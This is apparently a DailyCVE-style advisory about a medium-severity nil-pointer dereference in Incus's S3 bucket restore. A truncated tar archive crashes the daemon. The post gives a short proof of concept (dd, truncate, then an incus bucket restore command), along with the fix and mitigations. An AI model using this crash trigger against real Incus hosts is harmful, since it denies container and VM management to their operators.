Incus, Nil Pointer Dereference (medium)

By /

Listen to this Post

How the CVE works (approx. 20 lines):

The vulnerability exists in Incus’s S3 bucket restore functionality, specifically in `TransferManager.UploadAllFiles` (file transfer_manager.go). When importing a storage bucket backup as a tar archive, the code iterates over tar entries using `tr.Next()` inside a loop. The loop checks only for `io.EOF` to break normally. If `tr.Next()` returns any other error—such as `io.ErrUnexpectedEOF` from a truncated or corrupted archive—the returned header `hdr` becomes nil. The code does not validate for non-EOF errors and proceeds to dereference `hdr.Name` (e.g., to skip backup/index.yaml). This causes a nil-pointer dereference, leading to a panic and crashing the Incus daemon. An authenticated user can trigger this by providing a malformed backup file during S3 bucket restore. The crash is a denial-of-service. The affected loop is shown in the patch diff. A fuzz test confirms the panic: `go test ./test/fuzz -run=’FuzzS3BucketUploadTarParsing/s3_nil_deref_truncated_tar’` produces a runtime nil pointer dereference. The fix adds an explicit error check after tr.Next(), returning a formatted error instead of dereferencing nil. The patch was released in Incus v7.0.0.

DailyCVE form (3 words max per line):

Platform: Incus container
Version: v6.22.0
Vulnerability: Nil pointer dereference
Severity: Medium
date: 2025-05-04

Prediction: Patch already out

What Undercode Say:

Identify affected version
incus --version | grep "6.22.0"
Simulate truncated tar (proof of concept)
dd if=/dev/zero of=bad.tar bs=512 count=1
truncate -s 256 bad.tar
incus storage bucket restore mybucket ./bad.tar

Exploit:

Authenticated user uploads a truncated or corrupted tar archive as an S3 bucket backup. The daemon reads first entry, then on second `tr.Next()` returns io.ErrUnexpectedEOF. `hdr` is nil, and `hdr.Name` causes panic, crashing the daemon.

Protection from this CVE:

Upgrade to Incus v7.0.0 or later (patch included). If unable to upgrade, restrict S3 bucket restore permissions to trusted users only, and validate backup archives before import using `tar -tf` to check for integrity.

Impact:

Denial of service (daemon crash). No privilege escalation or data corruption. Requires authenticated access to Incus API. Crash disrupts container and VM management until daemon restarts.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top